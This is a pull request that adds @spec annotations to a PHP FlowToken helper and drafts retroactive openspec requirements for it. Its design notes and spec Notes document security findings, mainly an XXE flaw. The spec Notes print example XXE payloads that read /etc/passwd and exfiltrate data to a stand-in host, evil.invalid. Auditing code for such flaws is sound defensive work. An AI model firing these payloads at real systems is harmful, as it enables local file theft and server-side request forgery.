### PR TITLE
retrofit: reverse-spec flow-token-helper (5 REQs / 21 methods)

### DIFF
--- a/lib/Service/Helper/FlowToken.php
+++ b/lib/Service/Helper/FlowToken.php
@@ -94,6 +94,8 @@ class FlowToken
      * @param array       $syncInputOriginal  Original sync input snapshot.
      * @param array       $syncOutputOriginal Original sync output snapshot.
      * @param string|null $path               Request path used when serialising a Request.
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-1
      */
     public function __construct(
         IRequest|array $requestOriginal=[],
@@ -123,6 +125,8 @@ class FlowToken
      * @param boolean $proxyHeaders Whether to include X-Forwarded-* / X-Real-IP / X-Original-URI.
      *
      * @return array Map of lowercase header name to value.
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-1
      */
     private function getHeaders(array $server, bool $proxyHeaders=false): array
     {
@@ -161,6 +165,8 @@ class FlowToken
      * Gets the raw content for a http request from the input stream.
      *
      * @return string The raw content body for a http request.
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-1
      */
     private function getRawContent(): string
     {
@@ -174,6 +180,8 @@ class FlowToken
      * @param string $content Content to check.
      *
      * @return boolean True if content is valid XML.
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-1
      */
     private function looksLikeXml(string $content): bool
     {
@@ -196,6 +204,8 @@ class FlowToken
      * @param $request The inbound request used to determine content type and fallback parameters.
      *
      * @return mixed Parsed data (array for JSON/XML) or original string.
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-1
      */
     private function parseContent(IRequest $request): mixed
     {
@@ -247,6 +257,8 @@ class FlowToken
      * @param string|null $path            Path used when serialising a Request.
      *
      * @return array The stored array shape.
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-1
      */
     public function setRequestOriginal(array|IRequest $requestOriginal, ?string $path=null): array
     {
@@ -270,6 +282,8 @@ class FlowToken
      * Get the original request snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-1
      */
     public function getRequestOriginal(): array
     {
@@ -283,6 +297,8 @@ class FlowToken
      * @param array $requestAmended Amended request snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-4
      */
     public function setRequestAmended(array $requestAmended): array
     {
@@ -296,6 +312,8 @@ class FlowToken
      * Get the amended request snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-4
      */
     public function getRequestAmended(): array
     {
@@ -309,6 +327,8 @@ class FlowToken
      * @param array|Response $responseOriginal Original response or pre-built array payload.
      *
      * @return array The stored array shape.
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-2
      */
     public function setResponseOriginal(array|Response $responseOriginal): array
     {
@@ -337,6 +357,8 @@ class FlowToken
      * Get the original response snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-2
      */
     public function getResponseOriginal(): array
     {
@@ -350,6 +372,8 @@ class FlowToken
      * @param array $responseAmended Amended response snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-4
      */
     public function setResponseAmended(array $responseAmended): array
     {
@@ -363,6 +387,8 @@ class FlowToken
      * Get the amended response snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-4
      */
     public function getResponseAmended(): array
     {
@@ -376,6 +402,8 @@ class FlowToken
      * @param array $syncInputOriginal Original sync input snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-3
      */
     public function setSyncInputOriginal(array $syncInputOriginal): array
     {
@@ -389,6 +417,8 @@ class FlowToken
      * Get the original sync input snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-3
      */
     public function getSyncInputOriginal(): array
     {
@@ -402,6 +432,8 @@ class FlowToken
      * @param array $syncInputAmended Amended sync input snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-4
      */
     public function setSyncInputAmended(array $syncInputAmended): array
     {
@@ -414,6 +446,8 @@ class FlowToken
      * Get the amended sync input snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-4
      */
     public function getSyncInputAmended(): array
     {
@@ -427,6 +461,8 @@ class FlowToken
      * @param array $syncOutputOriginal Original sync output snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-3
      */
     public function setSyncOutputOriginal(array $syncOutputOriginal): array
     {
@@ -439,6 +475,8 @@ class FlowToken
      * Get the original sync output snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-3
      */
     public function getSyncOutputOriginal(): array
     {
@@ -452,6 +490,8 @@ class FlowToken
      * @param array $syncOutputAmended Amended sync output snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-4
      */
     public function setSyncOutputAmended(array $syncOutputAmended): array
     {
@@ -464,6 +504,8 @@ class FlowToken
      * Get the amended sync output snapshot.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-4
      */
     public function getSyncOutputAmended(): array
     {
@@ -475,6 +517,8 @@ class FlowToken
      * Serialise the FlowToken into an array suitable for json encoding.
      *
      * @return array
+     *
+     * @spec openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md#task-5
      */
     public function __serialize(): array
     {

--- a/openspec/changes/retrofit-2026-05-24-flow-token-helper/design.md
+++ b/openspec/changes/retrofit-2026-05-24-flow-token-helper/design.md
@@ -1,0 +1,54 @@
+# Design — Retrofit flow-token-helper
+
+Retrofit change. Tasks describe retroactive annotation, not new implementation work.
+
+## Context
+
+`lib/Service/Helper/FlowToken.php` is a mutable value-bag passed
+through the openconnector rule pipeline. It carries four PAIRED
+slots — `request`, `response`, `syncInput`, `syncOutput` — each with
+an `original` snapshot (the value as it entered the pipeline) and an
+`amended` snapshot (what subsequent rules may have rewritten). The
+ingest path normalises `IRequest` and `Response` objects into arrays;
+the amended setters are dumb pass-throughs.
+
+## Observed-but-suspicious behaviour (flagged, not fixed)
+
+| Site | Issue | Severity |
+|---|---|---|
+| `parseContent::simplexml_load_string` | parses inbound request bodies as XML when `Content-Type` is `application/xml` / `text/xml` (or empty + content sniffs as XML) with NO `LIBXML_NONET` / `LIBXML_DTDLOAD` defence. PHP's default libxml resolves DTD entities — an attacker-controlled XML body can: (a) exfiltrate local files via `<!ENTITY xxe SYSTEM "file:///etc/passwd">` (XXE), (b) trigger out-of-band DNS / HTTP via external entities (SSRF), (c) billion-laughs DoS. This is the entry point for every XML-shaped request that hits the rule pipeline. | **HIGH — CWE-611 / OWASP A05:2021 XXE** |
+| `looksLikeXml::simplexml_load_string` | same library call with same defaults, used as a probe. Even though the result is just a `bool`, parsing an attacker-controlled XML payload still resolves external entities → file read / SSRF. | **HIGH — CWE-611 via probe** |
+| `getRawContent::file_get_contents('php://input')` | reads the raw request body unconditionally. Combined with the XXE above, the input is then parsed without size limits — large bodies OOM the worker. | medium — soft DoS |
+| `getHeaders::HTTP_X_FORWARDED` filter | by default proxy headers (`X-Forwarded-*`, `X-Real-IP`, `X-Original-URI`) are FILTERED OUT, but the constructor call (line 257) passes `proxyHeaders: true`. Net: the headers passed to the rule pipeline include client-controllable proxy headers that downstream rules might treat as trustworthy (e.g. trusting `X-Forwarded-For` for ACL decisions). | medium — proxy-header trust drift |
+| `parseContent::multipart` | `request_parse_body()` returns `[$post, $files]`; the code `file_get_contents($file['tmp_name'])` reads every uploaded file into memory and merges it into `$post`. No file-size guard, no MIME check, no path-traversal sanitiser on the filename (`$file['tmp_name']` is server-controlled but `$post` keys come from the client). | medium — soft DoS / file-name confusion |
+| `parseContent::json_decode` fallback | uses `assoc=true` so JSON objects become arrays, then returns silently on `!== null`. Note that `json_decode('null', true)` returns `null`, but `json_decode('false', true)` returns `false` — the `!== null` guard means an XML payload that happens to be valid JSON `false` falls through to the XML branch, which then tries to parse `'false'` as XML. Edge case but observable. | low — edge-case priority confusion |
+| `__construct::array_merge` | `array_merge($request->getParams(), $this->parseContent($request))` lets parsed body keys OVERRIDE query-string params with the same name. Documented behaviour but a footgun for downstream rule writers who expect either source to win. | low — precedence surprise |
+| `setRequestOriginal::IRequest$path` | the `$path` argument is ONLY used when `requestOriginal instanceof IRequest`. If the array form is passed, the `$path` argument is silently dropped. | informational |
+| `setSyncOutputOriginal` constructor coupling | The constructor (`__construct`) seeds `amended` from `original` for all four pairs — so a caller that only sets `original` later via the setter ALSO needs to re-seed `amended` or the slot stays at its previous amended value. The setters do NOT auto-seed amended. | low — coupling surprise |
+
+## REQ → method map
+
+| REQ | Methods |
+|---|---|
+| REQ-001 | `__construct` (request ingest part) + `setRequestOriginal` + `getRequestOriginal` + private helpers `getHeaders`, `getRawContent`, `looksLikeXml`, `parseContent` |
+| REQ-002 | `setResponseOriginal` + `getResponseOriginal` |
+| REQ-003 | `setSyncInputOriginal` + `getSyncInputOriginal` + `setSyncOutputOriginal` + `getSyncOutputOriginal` |
+| REQ-004 | `setRequestAmended` + `getRequestAmended` + `setResponseAmended` + `getResponseAmended` + `setSyncInputAmended` + `getSyncInputAmended` + `setSyncOutputAmended` + `getSyncOutputAmended` (all 8 amended setters/getters — same pass-through shape) |
+| REQ-005 | `__serialize` |
+
+REQ-001 deliberately folds the private parsing helpers because they
+are only reachable from `setRequestOriginal` and their contracts
+collapse into the request-shape semantics.
+
+## What the spec deliberately does NOT cover
+
+- The rule pipeline that consumes / mutates the FlowToken — cluster
+  `rule-pipeline`, deferred.
+- The synchronization engine that produces `syncInput` / `syncOutput`
+  — cluster `synchronization-engine`, deferred.
+- The constructor's signature (DI-flavoured but the class is not
+  injected — it is `new`'d at the entry point of the rule pipeline).
+
+## Validation
+
+After archive, `openspec validate flow-token-helper --strict` MUST pass.

--- a/openspec/changes/retrofit-2026-05-24-flow-token-helper/proposal.md
+++ b/openspec/changes/retrofit-2026-05-24-flow-token-helper/proposal.md
@@ -1,0 +1,29 @@
+# Retrofit — flow-token-helper
+
+Describes observed behavior of 21 methods under `flow-token-helper` as 5 new REQs. Code already exists — this change retroactively specifies it.
+
+## Affected code units
+
+- `lib/Service/Helper/FlowToken.php::__construct()`
+- `lib/Service/Helper/FlowToken.php::setRequestOriginal()` + `::getRequestOriginal()`
+- `lib/Service/Helper/FlowToken.php::setRequestAmended()` + `::getRequestAmended()`
+- `lib/Service/Helper/FlowToken.php::setResponseOriginal()` + `::getResponseOriginal()`
+- `lib/Service/Helper/FlowToken.php::setResponseAmended()` + `::getResponseAmended()`
+- `lib/Service/Helper/FlowToken.php::setSyncInputOriginal()` + `::getSyncInputOriginal()`
+- `lib/Service/Helper/FlowToken.php::setSyncInputAmended()` + `::getSyncInputAmended()`
+- `lib/Service/Helper/FlowToken.php::setSyncOutputOriginal()` + `::getSyncOutputOriginal()`
+- `lib/Service/Helper/FlowToken.php::setSyncOutputAmended()` + `::getSyncOutputAmended()`
+- `lib/Service/Helper/FlowToken.php::getHeaders()` (private helper)
+- `lib/Service/Helper/FlowToken.php::getRawContent()` (private helper)
+- `lib/Service/Helper/FlowToken.php::looksLikeXml()` (private helper)
+- `lib/Service/Helper/FlowToken.php::parseContent()` (private helper)
+- `lib/Service/Helper/FlowToken.php::__serialize()`
+
+## Approach
+
+- For each method: describe observed inputs, outputs, pre/postconditions, failure modes
+- Draft REQs that match behavior (not aspirational)
+- Notes section + design.md surface a HIGH-severity XXE finding in `parseContent` + `looksLikeXml` (simplexml_load_string without LIBXML_NONET)
+- Cap REQs at 5: fold 8 identical paired get/set methods (sync I/O × original/amended) under one REQ; one REQ each for the request/response shape conversion + __serialize
+
+Source: openspec/coverage-report.md generated 2026-05-24. See [retrofit playbook](../../../.github/docs/claude/retrofit.md).

--- a/openspec/changes/retrofit-2026-05-24-flow-token-helper/specs/flow-token-helper/spec.md
+++ b/openspec/changes/retrofit-2026-05-24-flow-token-helper/specs/flow-token-helper/spec.md
@@ -1,0 +1,261 @@
+---
+retrofit: true
+status: draft
+---
+
+# Flow token helper
+
+## Purpose
+
+Mutable value-bag that carries four paired snapshots — `request`,
+`response`, `syncInput`, `syncOutput` — each with an `original` (the
+value as it entered the pipeline) and an `amended` (what rules may
+have rewritten) slot. Constructed at the entry point of the rule
+pipeline and threaded through every rule action so each can mutate
+the `amended` slot without losing the `original` for logging /
+diffing.
+
+This spec retroactively documents the observed contract. A HIGH-severity
+XXE finding in the request-ingest path is documented in REQ-001 Notes
+and design.md without being silently fixed.
+
+## ADDED Requirements
+
+### REQ-001: Request snapshot ingestion with content parsing
+
+`__construct(...)` MUST seed all four pairs by calling each
+`set<Slot>Original` followed by `set<Slot>Amended` with the value
+returned from `get<Slot>Original`. For the request slot specifically,
+the constructor passes `proxyHeaders: true` into the header extraction
+(see Notes).
+
+`setRequestOriginal(IRequest|array $requestOriginal, ?string $path =
+null): array` MUST normalise an `IRequest` argument into the array
+shape:
+
+```php
+[
+  'method'     => $request->getMethod(),
+  'headers'    => $this->getHeaders(server: $_SERVER, proxyHeaders: true),
+  'parameters' => array_merge($request->getParams(), $this->parseContent($request)),
+  'path'       => $path,
+]
+```
+
+An array argument MUST be stored verbatim. The method MUST return the
+stored array.
+
+`getRequestOriginal(): array` MUST return the stored array shape
+unmodified.
+
+The private helpers MUST behave as:
+
+- `getHeaders(array $server, bool $proxyHeaders = false): array` —
+  filter `$server` for `HTTP_*` keys, optionally include
+  `X-Forwarded-*` / `X-Real-IP` / `X-Original-URI` (when
+  `$proxyHeaders === true`), and return a map of lowercase header
+  name → value (with `HTTP_` prefix stripped).
+- `getRawContent(): string` — return `file_get_contents('php://input')`
+  unconditionally.
+- `looksLikeXml(string $content): bool` — return `true` iff
+  `simplexml_load_string($content) !== false`. Uses
+  `libxml_use_internal_errors(true)` + `libxml_clear_errors()` to
+  suppress warnings.
+- `parseContent(IRequest $request): mixed` — dispatch by
+  `Content-Type`:
+  - `multipart/form-data` → `request_parse_body()` then merge `$post`
+    with `array_map(fn $f => file_get_contents($f['tmp_name']),
+    $files)`.
+  - Otherwise: try `json_decode($content, true)` first; if non-null,
+    return the decoded array.
+  - If `Content-Type` is `application/xml` or `text/xml` (or empty
+    AND `looksLikeXml($content) === true`), parse via
+    `simplexml_load_string` and return
+    `json_decode(json_encode($xml), true)`.
+  - Fallback: return `$request->getParams()`.
+
+#### Scenario: IRequest body is normalised to the array shape
+
+- **GIVEN** an IRequest with method `POST`, headers `{ Content-Type: 'application/json' }`, raw body `{"a": 1}`
+- **WHEN** `setRequestOriginal($request, '/foo')` is called
+- **THEN** the stored shape carries `method: 'POST', path: '/foo', parameters: { a: 1 }`
+- **AND** `headers` is a lowercase-key map derived from `$_SERVER`
+
+#### Scenario: array argument is stored verbatim
+
+- **GIVEN** `$arr = ['method' => 'GET', 'parameters' => ['x' => 1]]`
+- **WHEN** `setRequestOriginal($arr)` is called
+- **THEN** `getRequestOriginal()` returns `$arr` byte-for-byte
+
+#### Scenario: JSON body shadows query-string params
+
+- **GIVEN** a request with `?x=fromQuery` AND body `{ "x": "fromBody" }`
+- **WHEN** the request is normalised
+- **THEN** the stored `parameters.x` is `'fromBody'` (`array_merge` favours the later argument)
+
+#### Scenario: XML body is converted via simplexml then json round-trip
+
+- **GIVEN** a request with `Content-Type: application/xml` and body `<root><a>1</a></root>`
+- **WHEN** `parseContent($request)` is called
+- **THEN** the return is `[ 'a' => '1' ]` (SimpleXML stringifies leaf values)
+
+#### Notes
+
+- **HIGH (CWE-611 / OWASP A05:2021 XXE):** `parseContent` and
+  `looksLikeXml` both call `simplexml_load_string` with default
+  libxml options. PHP's default permits DTD entity resolution
+  including external entities. An attacker who can shape the request
+  body and the `Content-Type` header — i.e. ANY caller hitting an
+  endpoint whose rule pipeline reads the FlowToken request — can
+  trigger:
+  - File read: `<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>`
+  - SSRF / OOB exfiltration: `<!ENTITY xxe SYSTEM "http://evil.invalid/?leak=...">`
+  - Billion-laughs DoS via nested entity expansion.
+  The retrofit deliberately documents this as the observed behaviour.
+  Hardening requires `simplexml_load_string($content, options:
+  LIBXML_NONET)` (PHP 8.0+) — and possibly an explicit
+  `libxml_set_external_entity_loader(null)` to ensure no external
+  resolution. Fix lands as a focused security change with regression
+  test (negative-XML payload).
+- **MEDIUM (proxy-header trust drift):** the constructor passes
+  `proxyHeaders: true`, so downstream rules see client-controllable
+  `X-Forwarded-For` / `X-Real-IP` / `X-Original-URI`. Trusting
+  these for ACL or routing decisions is unsafe unless Nextcloud's
+  trusted_proxies config is enforced.
+- **MEDIUM (soft DoS):** the multipart branch reads every uploaded
+  file into memory with no size guard.
+- **LOW:** `json_decode('false', true) !== null` so a literal `false`
+  body falls through to the XML branch.
+
+---
+
+### REQ-002: Response snapshot ingestion with object normalisation
+
+`setResponseOriginal(array|Response $responseOriginal): array` MUST
+normalise a Nextcloud `Response` instance into the array shape:
+
+```php
+[
+  'data'    => method_exists($response, 'getData') ? $response->getData() : [],
+  'headers' => $response->getHeaders(),
+  'status'  => $response->getStatus(),
+  'cookies' => $response->getCookies(),
+]
+```
+
+An array argument MUST be stored verbatim. The method MUST return the
+stored array.
+
+`getResponseOriginal(): array` MUST return the stored array.
+
+#### Scenario: JSONResponse-style object is normalised
+
+- **GIVEN** a `Response` subclass whose `getData()` returns `['ok' => true]`, status `200`, headers `['Content-Type' => 'application/json']`
+- **WHEN** `setResponseOriginal($response)` is called
+- **THEN** the stored shape is `{ data: { ok: true }, headers: { Content-Type: application/json }, status: 200, cookies: [] }`
+
+#### Scenario: a Response without getData yields an empty data array
+
+- **GIVEN** a `Response` whose class does NOT define `getData`
+- **WHEN** `setResponseOriginal($response)` is called
+- **THEN** the stored `data` is `[]`
+
+#### Notes
+
+- The `method_exists` probe means subclasses define the data contract;
+  the base `Response` does not carry `getData`.
+
+---
+
+### REQ-003: Sync input and sync output snapshot pairs
+
+`setSyncInputOriginal(array $syncInputOriginal): array` and
+`setSyncOutputOriginal(array $syncOutputOriginal): array` MUST store
+the argument verbatim and return it. `getSyncInputOriginal(): array`
+and `getSyncOutputOriginal(): array` MUST return the stored array.
+
+No normalisation, no validation, no type coercion.
+
+#### Scenario: setSyncInputOriginal stores verbatim
+
+- **WHEN** `setSyncInputOriginal(['records' => [1, 2, 3]])` is called
+- **THEN** `getSyncInputOriginal()` returns `['records' => [1, 2, 3]]`
+
+#### Scenario: setSyncOutputOriginal allows empty array
+
+- **WHEN** `setSyncOutputOriginal([])` is called
+- **THEN** `getSyncOutputOriginal()` returns `[]`
+
+---
+
+### REQ-004: Amended-snapshot pass-through accessors
+
+For each of the four slots there is a paired
+`set<Slot>Amended(array): array` / `get<Slot>Amended(): array`
+accessor. The setter MUST store the argument verbatim and return it.
+The getter MUST return the stored array. No type coercion, no
+defaulting, no observer pattern.
+
+Initial values are seeded from the matching `Original` slot by the
+constructor — but only at construction time. Subsequent
+`set<Slot>Original` calls do NOT re-seed the amended slot. The
+amended slot is "the most recent rewrite by the rule pipeline" with
+the constructor seed as the starting state.
+
+#### Scenario: amended seeds from original at construction
+
+- **GIVEN** `new FlowToken(requestOriginal: $reqArr)`
+- **WHEN** no setter has been called
+- **THEN** `getRequestAmended() === $reqArr`
+
+#### Scenario: re-setting original does NOT re-seed amended
+
+- **GIVEN** a FlowToken whose original was `['a' => 1]` and whose amended was rewritten to `['b' => 2]`
+- **WHEN** `setRequestOriginal(['c' => 3])` is called
+- **THEN** `getRequestOriginal()` returns `['c' => 3]`
+- **AND** `getRequestAmended()` still returns `['b' => 2]`
+
+#### Notes
+
+- This is a coupling surprise — callers that "reset" the token via
+  `set<Slot>Original` MUST also call `set<Slot>Amended` to keep the
+  pair in sync. Documented as observed; tightening to auto-seed on
+  set-original is a behavioural change worth a separate REQ +
+  migration.
+
+---
+
+### REQ-005: Serialisation for transport/logging
+
+`__serialize(): array` MUST return a fixed-shape array containing all
+8 slot values keyed by the slot name:
+
+```php
+[
+  'requestOriginal'    => <array>,
+  'requestAmended'     => <array>,
+  'responseOriginal'   => <array>,
+  'responseAmended'    => <array>,
+  'syncInputOriginal'  => <array>,
+  'syncInputAmended'   => <array>,
+  'syncOutputOriginal' => <array>,
+  'syncOutputAmended'  => <array>,
+]
+```
+
+The shape is the contract for both PHP's native `serialize()` flow
+(used when the token is queued or cached) and for `json_encode`
+(used when the token is logged).
+
+#### Scenario: serialise round-trips an 8-key array
+
+- **GIVEN** a FlowToken with all 4 slots populated
+- **WHEN** `__serialize()` is called
+- **THEN** the result is an associative array with exactly 8 keys in the order documented above
+
+#### Notes
+
+- There is no matching `__unserialize` — PHP's native unserialize
+  uses property defaults if `__unserialize` is absent. If the
+  serialised form is used for cross-request caching, the consumer
+  must re-construct the FlowToken via the public setters.

--- a/openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md
+++ b/openspec/changes/retrofit-2026-05-24-flow-token-helper/tasks.md
@@ -1,0 +1,7 @@
+# Tasks
+
+- [x] task-1: flow-token-helper#REQ-001 — Request snapshot ingestion with content parsing (retroactive annotation)
+- [x] task-2: flow-token-helper#REQ-002 — Response snapshot ingestion with object normalisation (retroactive annotation)
+- [x] task-3: flow-token-helper#REQ-003 — Sync input and sync output snapshot pairs (retroactive annotation)
+- [x] task-4: flow-token-helper#REQ-004 — Amended-snapshot pass-through accessors (retroactive annotation)
+- [x] task-5: flow-token-helper#REQ-005 — Serialisation for transport/logging (retroactive annotation)


### PR DESCRIPTION
## Retrofit — Reverse-Spec

Describes observed behavior of 21 methods under `flow-token-helper` as 5 new REQs.

Ghost change: `retrofit-2026-05-24-flow-token-helper` (drafted in `openspec/changes/`).

### What this PR does
- Drafts 5 REQs as a new capability spec (`retrofit: true`)
- Annotates 21 methods with `@spec` tags
- Folded methods: REQ-001 request ingest + 4 private helpers, REQ-002 response ingest pair, REQ-003 sync I/O originals pair, REQ-004 all 8 amended pass-through accessors, REQ-005 `__serialize`

### Security findings flagged (not fixed)
- **HIGH (CWE-611 / OWASP A05:2021 XXE)** — `parseContent` + `looksLikeXml` both call `simplexml_load_string` with PHP's default libxml options. DTD external-entity resolution is enabled. Any caller hitting an endpoint whose rule pipeline reads the FlowToken request can trigger XXE file-read (`file:///etc/passwd`), SSRF / OOB exfiltration, or billion-laughs DoS. Hardening requires `LIBXML_NONET` + `libxml_set_external_entity_loader(null)`.
- **MEDIUM (proxy-header trust drift)** — constructor passes `proxyHeaders: true`, so the headers passed to the rule pipeline include client-controllable `X-Forwarded-*` / `X-Real-IP` / `X-Original-URI`. Downstream rules treating these as trustworthy is the documented misuse.
- **MEDIUM (soft DoS)** — `parseContent`'s multipart branch reads every uploaded file into memory via `file_get_contents($tmp_name)`; `getRawContent` reads the entire body unconditionally. No size guards.
- **LOW (edge case)** — `json_decode('false', true)` returns `false` (not `null`); but the guard is `!== null`, so a literal `false` body actually short-circuits BEFORE XML. The reverse confusion is documented; net behaviour: JSON wins on any non-null parse.
- **LOW (coupling surprise)** — re-setting `Original` does NOT re-seed `Amended`. Only the constructor seeds amended-from-original. Callers must manually keep the pair in sync.

### Review focus
- REQ language matches observed behaviour (not aspirational)
- Scenarios are testable
- REQ-004 deliberately folds 8 near-identical pass-through accessors — splitting would yield REQ inflation

Source: `openspec/coverage-report.md` generated 2026-05-24 | Cluster: `flow-token-helper`

Refs ConductionNL/openconnector#936